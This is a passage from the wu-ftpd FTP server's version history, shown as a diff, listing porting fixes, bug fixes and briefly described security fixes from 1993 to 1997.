+ o  Porting corrections for FreeBSD.
+ o  Porting corrections for BSD/OS.
+ o  Fix a problem with the new, expired password support in beta-14.
+ o  Fix virutal hosting for AIX 4.1.x.
+ o  Fix some problems in S/KEY support.  This is conditionalized since
+    FreeBSD supports the old calling method.
+ o  Fixed a problem in ftpcmd.y concerning correctly recognizing the PASS
+    command in a non-case sensitive manner.
+ o  Correct some configuration file problems when compiling for NetBSD.
+ o  Correct a typo in fnmatch.c.  Also made changes to fnmatch.c to
+    accomodate the lack of certain flag definitions on systems that claim
+    to be POSIX compliant. These flags are not used by the current wu-ftpd
+    server code.
+ o  Correct the description of the command line -o option in the ftpd man
+    page.
+###########################################################################
+Changes in 2.4.2-BETA-14: Released 14 August, 1997
+ o  When wu-ftpd is used on Unixware, readdir in glob.c would not work as
+    expected since the version picked up during the link is the one from
+    the ucb library, not the regular C library.  Changed the UnixWare
+    Makefile to link the regular C libarary before the ucb library.
+ o  Port for IRIX 6.3 corrected.
+ o  Port for Unixware 2.1 corrected.
+ o  getspnam on Unixware 2.1 is not NIS aware, so the password read from
+    the password file should not be overwritten should the call fail.
+ o  Removed the dependency on libc in the makefile for Linux.
+ o  Port for AIX corrected.
+ o  NetBSD/sparc uses an int64_t for that stbuf.st_size. This means that
+    %qu should be used for a sprintf selector instead of %lu.
+ o  Found a problem with Solari 2.5.1 libraries when used in chrooted mode
+    along with a dynamically linked "ls". Sun has assigned a bugid for this
+    problem.  See the NOTES file for more on this.
+ o  Fixed another possible problem with ABOR verb processing with OOB data.
+ o  Using the /var/tmp directory for storing the pids is a bad idea.  All
+    configurations have been changed not to do this. This was really only
+    an issue on System V systems and older BSD systems.
+ o  There is a problem attempting to compile beta-13 with the Bellcore skey
+    library. That's because it doesn't compile with that version. The
+    version needed is the one from the logdaemon suite by Wietse Venema. I
+    am updating the documentation to make this clear.
+ o  It's easy for folks to get confused setting up the anonymous login and
+    use the /./ suffix on the home directory like that used for guestgroup.
+    When done, it will make other functions (like upload) in the ftpaccess
+    fail to work. Processing of the two should be the same.
+ o  Made a change to how the upload directive is parsed so that "no dirs"
+    does allow directories to be created and "no some-other-string" does
+    not.  Previously it didn't work this way.
+ o  A change made during the release of beta 12 changed how the upload
+    option did filename matching to make it non-intuitive. This change has
+    been reversed.
+ o  Made some fixes to some of the 5XX responses associated with failed
+    logins comply with RFC 959
+ o  Correct some logic which would cause the server to send two responses
+    to a client when passwd-check is used and the user failed to enter a
+    "valid" password when logging in anonymously.
+ o  The "deny" keyword when followed with a domainname glob did not work.
+    An IP address or address glob does work on SunOS 4.1.X machines. This
+    turns out to be an issue only if you are not running yp or if yp is not
+    able to access DNS.  To address this, I have added -lresolv to the
+    SunOS 4.1 makefile.
+ o  Remove HAVE_REGEX_H from the NeXTStep 3.X configuration.
+ o  Add a NOTE about a way to setup the "chroot" directory for wu-ftpd on
+    IRIX.
+ o  Correct a benign syntax problem in access.c. This might cause some
+    compilers to generate a warning.
+ o  A number of places in the software are attempting to print out off_t
+    values using printf selectors that can't handle the size.  Use casts to
+    work arround the problem for now, but the mess should be revamped.
+ o  Port for AU/X corrected.
+ o  Fix some logic errors in processing the ABOR verb.
+ o  Plug some memory leaks in the glob code.
+ o  The argv array should be zeroed out before loading it.  Also, ensure we
+    don't spill off the end of the argv array when filling it.
+ o  Fixed a problem in realpath that is exposed when it is called with a
+    rooted path. It could attempt to access an uninitialized location.
+ o  Corrected an error in the ftpaccess.5 man page concerning the
+    path-filter example.
+ o  Made some cleanups in the ftpaccess file in the doc/examples directory.
+ o  Fixed a bug in some of the debugging code where syslog is called
+    without a printf format string. This causes the daemon to crash on some
+    operating environments.
+ o  Added a NOTE about the conflict between using Virtual FTP and
+    TCPWrappers.
+ o  The passive subroutine might be vunerable to attack because a user
+    could attempt to start a passive connection without doing a login
+    first.  This is now checked in the passive connection.
+ o  /usr/ucb/installbsd should be used for installation on OSF/1.
+ o  Port correction for C2 security with Digital Unix 4.X. These changes
+    are made to the Digital Unix configuration. C2 is on by default.
+    "./build dec" to get this.
+ o  Corrected problems when processing the %E macro.  It becomes evident
+    with the %E macro is used twice in an extended message.  The entry
+    information is not reset between calls. This can cause information to
+    be printed twice.
+ o  FreeBSD support dirent.h and that sys/dir.h is being phased out. A
+    change to the FreeBSD configuration header file has been made to use
+    dirent.h in this release.
+ o  newvers.sh was made more POSIX compliant without affecting its
+    operation on non-POSIX systems.
+ o  The arguments for select() under HPUX may not have the same types as
+    those found on other systems.
+ o  Corrected a problem when %U is used in a banner prior to the user
+    performing a login.  Before beta 14, this could cause a segmentation
+    violation. Now, it will cause %U to print "[unknown]" since login has
+    not been done as yet.
+ o  Added a NOTE about Digital Unix and C2 security.
+ o  HAVE_STATVFS should be defined in the SGI IRIX configuration file.
+ o  Corrected a logic problem when the socket call fails when trying to
+    open a data socket. The close() was being made anyway and this would
+    generate a "bad file number" error since the socket never was opened.
+ o  SPT_TYPE should be SPT_NONE for SGI IRIX to insure that the time stamps
+    on things didn't get set to GMT.
+ o  The default umask should be 022 instead of 002.
+ o  ftpconversions and ftpgroup parsing was in a sad state.  Cleaned up.
+ o  Dealt with expired logins (when shadow passwords are used).
+ o  snprintf should be used now that there is good one for those systems
+    that don't have it in the support library and for those that do have
+    snprintf, it should be used where controlling the length of things is
+    important. To that end a number of changes have been made in ftpd.c to
+    use snprintf more widely.
+ o  On some versions of SunOS 4.X, the size_t typedef is not pulled in with
+    the include directives that are there. I have modified snprintf.c to
+    include <stdlib.h> when an ANSI C compilier is used and <sys/types.h>
+    when one is not used. Hopefully, that will catch a size_t definition.
+    If not, let me know, but do be sure to include what OS release and what
+    compiler you are using. Additionally, I had left "const" definitions in
+    places where non-ANSI C compilers would encounter them. I have removed
+    those.
+ o  Port for SunOS 4.1.x corrected.
+ o  Fixed an error in the ftpaccess file handling for the tar and compress
+    keywords.  If any class was permitted to use them, then any class was.
+ o  Fixed some typos in the Makefiles: using .c where .o is correct.
+ o  \r\n is no longer passed to setproctitle since beta-13, so it does not
+    need to attempt to strip.
+ o  ftpcmd.y has a one-off error in checking the length of a string.
+ o  Fixed popen.c to keep it from overflowing the argv buffer and from
+    freeing space that was not allocated for that same argv buffer.
+ o  Fixed access.c and ftpcount.c to address a problem in a bug fix in
+    beta-13 that kept access limits involving days other than Any from
+    being enforced.
+ o  Fixed the xferstats script to allow it work when the log involves
+    timestamps from two years.
+ o  Port for IRIX corrected.
+ o  RMD and DELE should both check permissions before attempting to do
+    anything.
+ o  getdatasock should return the errno to the caller that caused the
+    socket call to fail (as opposed to anything else that happens in that
+    routine).
+ o  FreeBSD uses <sys/mount.h> for file system information used by the %F
+    macro.
+ o  Add a define (HAVE_GETRLIMIT) to the config.hpx for HP-UX 10.10.
+ o  Port for Linux corrected.
+ o  Fixed a bug in the SITE CHMOD command that would cause the server to
+    send two replies in some cases. This could confuse some FTP clients
+    (and is a violation of protocol anyway).  This should have been in
+    beta-13, but I missed it somehow.
+ o  The dependencies on vers.c that are not uniform in all makefiles and
+    can cause problems with certain versions of make.  All makefiles for
+    all operating systems supported in this distribution now have an
+    explict dependency that should cause newvers.sh to be run if yacc was
+    successful in building ftpcmd.c from ftpcmd.y. It will also properly
+    stop attempting to compile anything (other than ckconfig) until this
+    problem is fixed by the user. This can usually be done by being sure
+    yacc is installed and in the user's PATH.
+ o  Fixed a Y2K compliance problem in ftpcmd.y where the year would always
+    be printed as 19XX.  wu-ftpd is as Y2K compliant as it can be with this
+    fix.
+ o  I edited the INSTALL, README and NOTES documents in an attempt to make
+    them clearer. I had a number of questions about "-a" and
+    /etc/inetd.conf.  People evidently don't read the README file very
+    closely, so now I have put this information in more places than just
+    the NOTES file. Hopefully that will stop most of these types of
+    questions.
+###########################################################################
+Changes in 2.4.2-BETA-13: Released 3 March, 1997
+ o  I noticed that setproctitle was not being called correctly in a couple
+    of places in ftpd.c. There were not enough arguments.
+ o  Fixed some coding problems in access.c when determining host access
+    information.
+ o  Added some bounds checking ftpd when building the directory command to
+    send to the operating system. These changes may not be portable to all
+    platforms, since they use snprintf, but we'll give it a try.
+ o  Port for SCO Openserver 5 corrected.
+ o  ftpcount.c does not include stdlib.h, which will cause malloc to
+    allocate too little space to hold st_size on FreeBSD.
+ o  The failsafe number of fds in popen.c should be bigger than
+    sizeof(long).  I am setting it to 31. We'll see if that helps folks
+    have fewer signal 10 or 11 errors that are unexplained.
+ o  FreeBSD already had the fnmatch function in its C library and didn't
+    need the version in the support library.
+ o  Removed all references to LOG_TOOMANY, since it is no longer being
+    actually implemented.
+ o  Enforce FreeBSD (when this software is built on FreeBSD) concerning the
+    logging of numeric addresses when DNS name is larger than UT_HOSTSIZE
+    field.
+ o  Removed \r\n from any string put in setproctitle.
+ o  Made some fixes to skey support.
+ o  Fixed some problems with the INSTALL file. There was a missing step and
+    other problems.
+ o  sysconf be used to get the number of fds. This has been added to
+    popen.c and a change has been made to config.hpx to use that. I have
+    also tried to add this to other configurations that are documented (or
+    are known) to support sysconf.
+ o  There was an extra %s in one of the reply strings. This is now fixed.
+ o  Corrected a problem in the code I put into popen.c to attempt to
+    address an overflow problem. Too much late night coding for me:-).
+ o  Corrected an inconsistency in the forward definition of realpath when a
+    STDC compiler is used.
+ o  Corrected a problem with compiling wu-ftpd on OSF. This is due to an
+    failure in the software to include the correct include file.
+###########################################################################
+Changes in 2.4.2-BETA-12: Released 19 January, 1997
+ o  The use of putchar in ftpd.c and ftpcmd.y might have side effects on
+    argument lists when putchar is a macro.  The use of putchar has been
+    changed to putc in these files for this release.
+ o  Made some changes to ftpcount.c to make it return more useful
+    information when used with Solaris2 and AIX.
+ o  Added a mechanism to permit AIX hosts to make effective use of the
+    virtual host feature in wu-ftpd.
+ o  FreeBSD configuration should not install the sample configuration files
+    over previously existing ones.  This release does not install them at
+    all.
+ o  Added additional protection for some operating system over the
+    protection already provided.
+ o  Made a fix to the virtual host code that permits guest groups to
+    continue to work.
+ o  Made a significant security fix without which regular and anonymous
+    users could access files as the root user.
+ o  Made a fix to permit bad autogroup entries in the ftpaccess file to be
+    ignored.
+ o  The readme directive should really only apply to regular files.
+ o  Corrected a number of problems with upload.
+ o  Corrected an inconsistency between the documentation and how the server
+    logs information. The server has been fixed to document guest users in
+    the xferlog with a "g" and real users with a "r".
+ o  Corrected an inconsistent use of #if verus #ifdef in authenticate.c.
+ o  Fixed some bugs in the build program.
+ o  ftpd.c should use getopt.
+ o  Fixed a bug in how ftpcount reports classes that can have an unlimited
+    number of users.
+ o  All filename checking should be case sensitive.
+ o  Fixed a bug in how the shutdown feature works. The bug is that new
+    connections may continue to be accepted after shutdown is in effect.
+ o  Fixed a bug in how the ftw.h file in the support directory gets
+    included when it shouldn't be for Unixware 2.1.
+ o  Made changes to ftpcmd.y to ensure that free() is only called when the
+    arguments are non-null.
+ o  Ported to AU/X 3.0
+ o  Fixed it so that "anonymous" and "ftp" are made to be the same as far
+    as the server is concerned.
+ o  Corrected a mispelling in the NOTES file.
+ o  Corrected a bug introduced in the academ betas with the T_ASCII flag in
+    ftpconversions. Its meaning had become reverse from what it used to be.
+ o  Fixed a problem in the old virtual code where an illegal strcpy was
+    being done.
+ o  Fixed the basic problems introduced in beta-11 with the virtual host
+    code. There have been no changes in how the configuration files are
+    configured.
+ o  The ftpgroups and ftpconversions file checks in conversions.c and acl.c
+    should be done using an fstat after an open succeeds.
+ o  There were places where files could or should be closed.
+ o  Corrected some macro inconsistencies in the manual pages.
+ o  Corrected some typos in the manual pages.
+ o  fnmatch.c did not have the right flags defined correctly.
+ o  Unixware 2.1 supports getrlimit.  So, this is now added to config.uxw
+    in the src/config directory.
+ o  stderr output from ftpd when being started by inetd were problematical.
+    These error messages now go to syslog.
+ o  AUSCERT brought to my attention a need to check to be sure the 100
+    element argv array in the popen subroutine is not overflowed. This is
+    now done.
+ o  Subsequent files requests couldn't be aborted correctly.
+ o  Prevented a possible overflow problem when processing the SITE CHMOD
+    and SITE UMASK commands. The server did not check for overflow
+    conditions.
+ o  STAT was using a 211 response when a 213 is probably better.
+ o  RFC 1127's suggestions are not being followed by this server
+ o  Subsequent files upload requests couldn't be restarted correctly.
+ o  Having the debug mode log passwords is not good.
+ o  Corrected a typo on one of the URLs in the NOTES file.
+ o  When a null is sent to the server, it should ignore it but was treating
+    it like EOF. Now it does ignore it.
+ o  Corrected errors in the ftpd.8 manual page.
+ o  Made some adjustments for making better use of available library
+    routines in Unixware 2.1.
+ o  Solaris 2.X does support getrlimit.  Changed config.sol to make use of
+    it.
+ o  Ported to Digital Unix 3.2 with C2 Security.
+ o  There were some instances in ftpcmd.y where values could be NULL. This
+    would cause segmentation violations on may flavors of Unix.
+ o  Fixed a bug in processing "SITE CHMOD 0". The command didn't work and
+    the server didn't give a reply.
+ o  Linux 2.0 (actually libc 5.3.12) changed the way that directory
+    manupulation was done.  The problem was that glob.c would not compile
+    on Linux 2.X systems.  Ensured that Linux 1.X users would still be able
+    to use this on their systems.
+###########################################################################
+Changes in 2.4.2-BETA-11: Released 15 April, 1996
+ o  The manual pages for ftpaccess.5 and ftpd.8 have been modified. ftpd.8
+    now documentes the previously undocumented "-u umask" option.
+    ftpaccess.5 now clarifies the fact that the root-dir specified in the
+    upload configuration line MUST match the home directory in the
+    operation system password database.
+ o  Fixes for the optional shadow password file support for Linux.
+ o  The configuration file for Solaris specified the MAXHOSTNAMELEN before
+    it was possible to check to see if was defined and this caused there to
+    be spurious (and benign) error messages to be generated.
+ o  The file size in BSDI 1.1 is a long not a quad_t. This means that the
+    conversion arguement should not be qd for sprintf's involving this
+    variable.
+###########################################################################
+Changes in 2.4.2-BETA-10: Released 15 March, 1996
+ o  Made some changes for AIX that I can't verify since I don't have AIX.
+ o  Added a number of small changes for FreeBSD.
+ o  Modified support for virtual domains.  Modified the
+    VIRTUAL.FTP.SUPPPORT support file and the man pages to reflect this
+    change.
+ o  Added back an idle timeout routine that appears to compile cleanly on
+    all the systems I test on.
+ o  Fixed some configuration problems for Linux.
+ o  Fixed the output of "site help" command to return the email address
+    listed in the "email" entry from the ftpaccess file (if available).
+###########################################################################
+Changes in 2.4.2-BETA-9: Released 23 January, 1996
+ o  Two changes to popen.c:  In the child process, the port attached to the
+    ftp protocol port is now closed before exec();  In the child process,
+    the effective user and group ids are set as the real user and group ids
+    prior to exec().
+ o  The "nodirs" option of the upload directive in an ftpaccess file is now
+    fixed and actually works.
+ o  Added endgrent() to access.c, private.c and extensions.c to ensure the
+    /etc/group or ~ftp/etc/group file is closed after it is used. Fix
+    suggested by CERT.
+ o  Moved openlog() in ftpd.c up closer to the beginning of the program.
+    Fix suggested by CERT.
+ o  Fixed all the support makefiles to build vsnprintf in the support
+    library since most systems do not have it. I have left it out of
+    systems that I know do have the real library routine (all BSD 4.4-Lite
+    based OSes have this).
+###########################################################################
+Changes in 2.4.2-BETA-8: Released 5 December, 1995
+ o  Overhauled reply, lreply and setproctitle to make appropriate use of
+    varargs or stdargs as appropriate.
+ o  Added some FAQ references in the README file.
+ o  Added HAVE_GETRLIMIT and changes config files to support it where
+    available in preference to HAVE_GETDTABLESIZE, which is now obsolete.
+ o  Added HAVE_SETPROCTITLE as a possible define to include the
+    setproctitle() library routine from the system if it is available.
+ o  Added differentiator so that BSDI 1.X setproctitle() library routine is
+    not used since it appears to be buggy.
+ o  Made a number of changes for BSD/OS.
+ o  Lowered optimization level from O3 to O2 for AIX.
+ o  Added some information in NOTES for adding shadow support under Linux.
+ o  Added some fixed for the use of sys_siglist.  HAS_SIGLIST must be
+    defined for this to be used.
+ o  Added some fixes for CPP processing problems with Digital Unix.
+###########################################################################
+Changes in 2.4.2-BETA-7: Released 23 October, 1995
+ o  Support for Hitachi Unix variant added.
+ o  Changes in the configuration files for BSD/OS to accomodate a bug in
+    the sprintf inheritied from BSD 4.4 Lite. (Effects FreeBSD, NetBSD and
+    BSD/OS.)
+ o  Addition of a cookie '%u' to extensions.c which will show the RFC931
+    remote username when available. I somehow like it to have the remote
+    user see we take the 'all actions are logged' line seriously.
+ o  Support for SCO added.
+ o  Corrected the diagnostics from the randomsig subroutine.
+###########################################################################
+Changes in 2.4.2-BETA-6: Released 15 October, 1995
+    If you have an original copy of 2.4.2-BETA-6, the WU-FTPD Development
+    Group would like a copy.
+ o  Added virtual ftp server support.
+ o  Added some AIX patches.
+ o  Added some notes concerning skey support in the NOTES file.
+ o  Config files for BSD 4.4-based OSes added.
+ o  Closing some file descriptors before exec in ftpd_popen (popen.c).
+ o  Missed changes to fnmatch in access.c.
+ o  Fixed ftpconversion problems when gzcating plain files.
+###########################################################################
+Changes in 2.4.2-BETA-5: Released 11 July, 1995
+ o  Fixed ftpcmd.y parser for bug that has been present since the release
+    of the NET-2 ftp daemon. Multiple 500 lines are not returned when
+    certain bad commands are presented to the server.
+ o  Changed build to make the tar file create a directory that is the
+    current release name and unpack into that newly created directory
+    relative to the current directory.
+ o  Keep wu-ftpd from hanging when trying to use ident to identify someone.
+ o  More fixes to the config.hpx file for HP-UX.
+###########################################################################
+Changes in 2.4.2-BETA-4: Released 29 June, 1995
+ o  Replaced a large part of the noretrieve subroutine in extensions.c.
+ o  Fixes for HPUX.
+ o  Fixed up the Makefiles for SunOS 4.1.X to make use of the dynamic load
+    library correctly. This should probably be reworked to only use static
+    linking, but that will be looked at another time.
+ o  Fixed some more bad NULL versus '\0' problems in ftpd.c and realpath.c
+    in the src directory.
+###########################################################################
+Changes in 2.4.2-BETA-3: Released 18 June, 1995
+    If you have an original copy of 2.4.2-BETA-3, the WU-FTPD Development
+    Group would like a copy.
+ o  Created the NOTES file and revised the README and INSTALL documents.
+ o  Fixed some minor source code cast that the SunPro C compiler was
+    complaining about. Files affected (all in the src directory) are:
+    ftpcmd.y, realpath.c, private.c, logwtmp.c, ftpd.c extensions.c
+ o  Revised the LINUX support to conform to LINUX 1.2.8 with gcc 2.6.3 from
+    the slakware distribution.
+###########################################################################
+Changes in 2.4.2-BETA-2: Released 18 June, 1995
+    This version merged much of the functionality of 2.4-hobbit into Stan's
+    baseline.
+    If you have an original copy of 2.4.2-BETA-2, or 2.4-hobbit, the
+    WU-FTPD Development Group would like a copy.
+ o  Removed the timeout patch from Dan Thorson that was in BETA-1. However,
+    it will be back in a future beta.
+ o  Lifted from the Debian wu-ftpd-2.4-4 release with little or no change:
+        doc/ftpaccess.5
+        doc/ftpd.8
+        config/config.lnx
+        config/config.s41
+        src/access.c
+        src/acl.c
+        src/ftpcount.c
+        src/ftpshut.c
+        src/hostacc.c
+        src/logwtmp.c
+ o  build: added a kludge for enabling these changes, by spawning a shell.
+    Added specific support for FreeBSD 2.0.  Also, copy the Makefiles and
+    config.h instead of hardlinking them, so that edits don't trash the
+    original copies!
+ o  support/authuser.c: limit sscanf() of identd strings.
+ o  support/makefiles/*: minor changes to a couple of system-specific
+    Makefiles.
+ o  extensions.c: [Debian -- "noretrieve" ACL keyword handler, NULL fixups]
+ o  extensions.c: Fix losing null dereference in Debian checknoretrieve().
+ o  extensions.c: #ifdef PARANOID -- disallow file deletion completely.
+ o  ftpcmd.y: [Debian -- "bison" patch for linux just moved some decls
+    around]
+ o  ftpcmd.y: check PORT command against a bunch of things: being logged
+    in, the client's source address, and the actual port number 1024 or
+    greater.
+ o  ftpcmd.y: require login before various other things work: PASV, RNTO
+ o  ftpcmd.y: #ifdef PARANOID -- disable, trap, and log all SITE commands.
+    Comments withheld about the lineage of whoever cooked up *that* gem.
+ o  ftpd.c: [Debian -- support "noretrieve" ACL keyword; misc NULL fixups]
+ o  ftpd.c: preload assorted variables with reasonable values.  Globalize
+    guestpw and authuser and update them so all routines can access them
+    for correct logging.
+ o  ftpd.c: disallow "re-login".
+ o  ftpd.c: #ifdef ANON_ONLY -- only allow anonymous logins.  Designed for
+    the ftpd you hang out on your external machine.
+ o  ftpd.c: various places -- if told not to use the "ftpaccess" file,
+    genuinely don't use routines that deal with it at all.  [May save some
+    of our butts when someone finds a bug in the extensions code!]
+ o  ftpd.c: #ifdef SKEY, added s/key functionality.  The challenge emerges
+    where the "Password required for username" response is normally sent.
+ o  ftpd.c: add endspent() to the shadow code, per Marek M.
+ o  ftpd.c: Flag attempts to exploit the trojanized 2.2c version.
+ o  ftpd.c: #ifdef STUPID_SPRINTF -- break up big "sprintf" for xferlog
+    into two pieces.  On some systems, sprintf is BROKEN.  If you're using
+    xferlog and your ftpd crashes right after a transfer, you probably need
+    this.
+ o  ftpd.c: #ifdef PARANOID, disable file overwriting, with either "put" or
+    "rename".
+ o  ftpd.c: Fix an ACL bug in renamefrom().  Doing two renames in a row
+    would bypass the setting in the ACL file.
+ o  ftpd.c: call realpath() to get current wd.
+ o  ftpd.c: close data ports upon exiting, and close old PASV port if told
+    to open a new one.
+ o  newvers.sh: include tiny little advertisement.
+ o  makefiles/Makefile.lnx: Mostly Debian; add -static, remove -DDEBUG, put
+    in the "bison fix".
+ o  makefiles/Makefile.fbs: Add for FreeBSD 2.0; slight mod of "bsd".
+ o  config/config.fbs: config.h for Freebsd 2.0.  Contains a hack to work
+    around the fact that freebsd stdlib.h comes with a realpath() and the
+    define in ftpd.c conflicts with it.
+ o  config/config.lnx: Debian version, with the same realpath() hack added.
+    Linux has trouble with this too, but in unistd.h.  Put "realpath" back
+    into SRCS and OBJS definitions.
+ o  pathnames.linux: From Debian.  Use this as a starting point for
+    customizing pathnames.h on linux.  A remaining deficiency is that NONE
+    of the sources even *try* to reference the /usr/include/paths.h that
+    many systems now have.
+ o  Version bumped to 2.4.2; no reason given but we can safely presume the
+    reason was the confusion in version names in Stan's earlier releases.
+###########################################################################
+Changes in 2.4.1-BETA-1: Released 13 May, 1995
+    AKA 2.4.1-BETA
+    AKA 2.4.2-BETA-1
+    This version was announced and released as wu-ftpd-2.4.1-beta-1.tar, but
+    other emails, and internal notes in later versions, refer to this version
+    under all three names interchangably.
+    If you have an original copy of 2.4.1-BETA-1, the WU-FTPD Development
+    Group would like a copy.
+ o  Added changes for Solaris 2.4 compatibility. Changed the flag from
+    SOLARIS21 to SOLARIS and made the changes generic for all releases of
+    Solaris.
+ o  Added changes for UnixWare 4.2 compatibility. Added Makefiles and config.h
+    header files. 
+ o  Added ftruncate support routine for machines that don't have ftruncate, but
+    do have chsize call.
+ o  Added a timeout patch created by Dan Thorson at Seagate to keep the server
+    from creating a zombie process when a PASV client never actually connects.
+    NOTE: This patch is commented out since I could not get it to work
+    correctly and I hope someone will be able to fix this before we go to
+    release.  There was also another timeout patch that may be more suitable.
+    Comments are welcome.
+ o  Added patches to hostacc.c to insure that memory dynamically allocated with
+    malloc() is not free()d more than once. Patch from Jaakko Hyvatti.
+ o  Split the support/strcasestr.c into two files: strcaststr.c and strstr.c
+    and altered the Makefiles to include the appropriate libraries in the
+    support library.
+ o  Stan Barber took over stewardship of the daemon using 2.4-academ as the
+    baseline for future development on 6 May, 1995.  This ended a 13-month
+    period where there was no maintainer at all!
+###########################################################################
+Changes in 2.4-academ: Release date lost in the mists of time
+    AKA 2.4.1-academ
+    It is unknown whether Stan ever publicly released this version under
+    either name.  Emails, and internal notes in later versions, refer to
+    this version under both names interchangably.
+    If you have an original copy of 2.4-academ, or 2.4.1-academ, the WU-FTPD
+    Development Group would like a copy.
+ o  Ported to BSDi.
+ o  Changed the fnmatch.c program in the support directory to return values
+    that corresponded with the manual page. This was not necessary to
+    support BSDi since it has its own fnmatch, but this make it possible
+    for other platforms to make use of these changes transparently.
+ o  Changed the access.c program to do a case-insensitive search on the
+    hostname without using fnmatch. This option is not supported by the
+    bsdi or bsd-net2 fnmatch subroutine.
+ o  Changed all uses of fnmatch in the src directory to use the correct
+    return values.
+ o  Added pathnames appropriate to bsdi to the pathnames.h file in the src
+    directory. These are bracketed by appropriate #ifdef/#endif blocks.
+ o  Changed the root level makefile to copy files when installing them
+    instead of moving them.
+ o  Created a set of root level makefiles for each supported platform. This
+    will allow the ftpd to be installed exactly over the OS-based makefile
+    if used generically.
+###########################################################################
+Changes in 2.4: Rereleased on 6 January, 1997
+ o  Documentation update to point to the new address for the list server at
+    Washington University at Saint Louis.
+ o  Corrected documentation error: this is version 2.4 not 2.2
+ o  Prevent reception of SIGURG from resulting in a resumption back to the
+    main program loop.
+###########################################################################
+Changes in 2.4: Rereleased on 13 November, 1995
+ o  Documentation update to point toward Stan Barber as the maintainer of
+    WU-FTPD.
+###########################################################################
+Changes in 2.4: Released on 13 April, 1994
+ o  This marks the end of Byran D O'Connor's tenure as prinicple developer.
+    With his graduation, grants funding development were not renewed.
+ o  Removed some race conditions.
+ o  Fixed a spelling mistake.
+ o  Now uses sys/syslog.h on Ultrix systems.
+###########################################################################
+Changes in 2.3: Released on 4 April, 1994
+ o  Bump the version number to avoid confusing with Trojan version.
+###########################################################################
+Changes in 2.2: Released on 1 April, 1994
+ o  Fixed a bug in path processing of SITE EXEC commands.
+ o  Rewrote parts of private.c parsing routine, fixing problems with
+    overloading the definition of gid_t.
+ o  Added support for class lists in separate file.
+ o  Changed a couple of occurrences of stat() to lstat() in delete() and
+    renamefrom().
+ o  Changed #ifdef LOG_LOCAL7 to #ifdef FACILITY in ftpd.c
+###########################################################################
+Changes in 2.1f: Released 25 March, 1994
+ o  Fixed NeXT config problem with NGROUPS_MAX.
+ o  Fixed multiple response bug with ftp|anonymous in /etc/ftpusers file.
+ o  Fixed BUS ERROR on upload on Sun 4.1.x systems.
+###########################################################################
+Changes in 2.1e: Released 24 March, 1994
+ o  Fixed class determination code from failing after failed attempt.
+ o  Moved ACCESS DENIED syslog messages to LOG_NOTICE from LOG_INFO.
+ o  Fixed problems with NFS and server running as root.
+ o  Fixed problems with APPEND/OVERWRITE.
+ o  Patched SCO files to work with 3.2.4.
+ o  Fixed problems with uid/gid's.
+ o  Changed upload examples in ftpaccess.5 to be correct.
+ o  Allow for escaped #s in the ftpaccess file.
+ o  hostacc.c patches.
+ o  ftpshut.c: fixed file open problem when shutdown not defined.
+ o  Added acl_remove() to fix problems with dangling PIDs in PID files.
+ o  Fixed bug with real users > limit hanging clients.
+###########################################################################
+Changes in 2.1d: Release date lost in the mists of time.
+    If you have an original copy of 2.1d, the WU-FTPD Development Group
+    would like a copy.
+ o  The changes for 2.1d were lost.
+###########################################################################
+Changes in 2.1c: Released on 25 August, 1993
+ o  Fixed stupid bug with non-initialized pointers in *_check() functions.
+###########################################################################
+Changes in 2.1b: Released on 16 July, 1993
+ o  Append now works again.  A previous fix to solved files not getting
+    truncated properly had broken it.
+ o  Double conversions were not working properly for some conversions.
+ o  Minor HP-UX portability problems corrected.
+ o  Minor Host Access case sensitivity bug fixed.
+ o  syslog after chroot fixed for SunOS by addition of TCP version of
+    syslog functions.  (It is syslog.c in the support directory.)
+ o  Data General support added.
+ o  ISC support added.
+ o  Added "rename <type> <yes|no>" option to prevent renaming files.
+ o  Fixed unsigned int comparisons to -1.
+ o  Added ckconfig program for checking proper locations of config files.
+ o  Changed syntax of "upload" command to include which ftp hierarchy it
+    pertains.
+ o  Fixed some documentation errors.
+###########################################################################
+Changes in 2.1a: Released on 27 May, 1993
+ o  Tabs were put back into the Makefiles for AIX.
+ o  acl_join() did not open the pid file is pidfd was invalid.
+ o  acl_join() did not unlock the pid file if user was already in there.
+###########################################################################
+Changes in 2.1: Released on 12 May, 1993
+ o  Replaced xferstats.
+ o  Default was to not allow uploads ever.  This is backwards, if no upload
+    keywords are given, it should act like a normal server.
+ o  Double conversion stuff works now, but you know that already.  Included
+    is a gzip2comp (in util) for converting from gzip format to compress.
+ o  cwd_beenhere() now calls realpath(".", cwd) to figure out the path.
+    This works for people in directories that are private.  That is that
+    some component of their path is not readable by them.  (cwdir() fails
+    in such a case.)
+ o  In an upload command, trying to set a file mode of 0000 would fail.
+    This is now possible.
+ o  makedir() did not work properly for real users.  This has also been
+    fixed.
+ o  Fixed up support for NeXT and other systems.  I cannot test these
+    things, so there are bound to be problems.
+ o  In getgrent.c, removed the need for getgrent.c from the support
+    library.  This caused problems with systems running yellow pages (NIS).
+    All gids in the private file are now parsed before the chroot().  This
+    gives us one less open file descriptor.
+ o  For upload/truncate, STORE was not properly trunctating files when
+    overwriting them.
+ o  Upload failing with directories in makedir/put commands: STORE and
+    MAKEDIR were failing when giving full path names.
+ o  Multiple process ids were written into the pid-files when a failed
+    login attempt was made.  This caused problems with usage counts.
+ o  Added the %E magic cookie which gets replaced with the "email" string
+    from the ftpaccess file.
+ o  For the %F magic cookie: added trivial support for Solaris 2.1 (at
+    least).  If you fix this for your system, send me a patch.
+ o  The %N magic cookie did not work after the chroot().  The pid file has
+    to remain open for the duration of the server's life now in order for
+    this to work.
+ o  In support/paths.h, removed the need for this file.  It caused more
+    problems than it was worth.  The two #defines that were used were moved
+    to src/pathnames.h
+ o  upload * no dirs: you can now specify a directory that does not allow
+    uploads but does allow the creation of directories.
+ o  You can now get a listing of what aliases are available.  At the ftp
+    prompt type "quote site alias".
+ o  You can now specify a cdpath (like the csh variable).
+ o  You can specify an email address for the maintainer of the archive.
+    This string will be used for the %E magic cookie.
+###########################################################################
+Changes in 2.0: Rereleased on 12 April, 1993
+ o  Changed support/ftp.h to use the BSD copyright and remove the DEC
+    copyright.  DEC's version was just a copy of BSD's.
+###########################################################################
+Changes in 2.0: Released on 8 April, 1993
+ o  guestgroup access no longer needs an entry in the secondary passwd file
+    (~ftp/etc/passwd).  The home directory is now specified as
+    "root/./home" For example:
+    ftptest:<encrypted>:100:200:Guest User:/var/ftp/./incoming:/etc/noshell
+    When ftptest logs in, it will chroot to /var/ftp and then chdir to
+    /incoming (which is actually /var/ftp/incoming before the chroot).
+    Since the directory in /etc/passwd actually points to the guest's home
+    directory, they can use .forward files, etc.
+ o  ftpshut program generates shutdown file for ftp server.  Works 
+    similarly to shutdown(8).  See ftpshut(8).
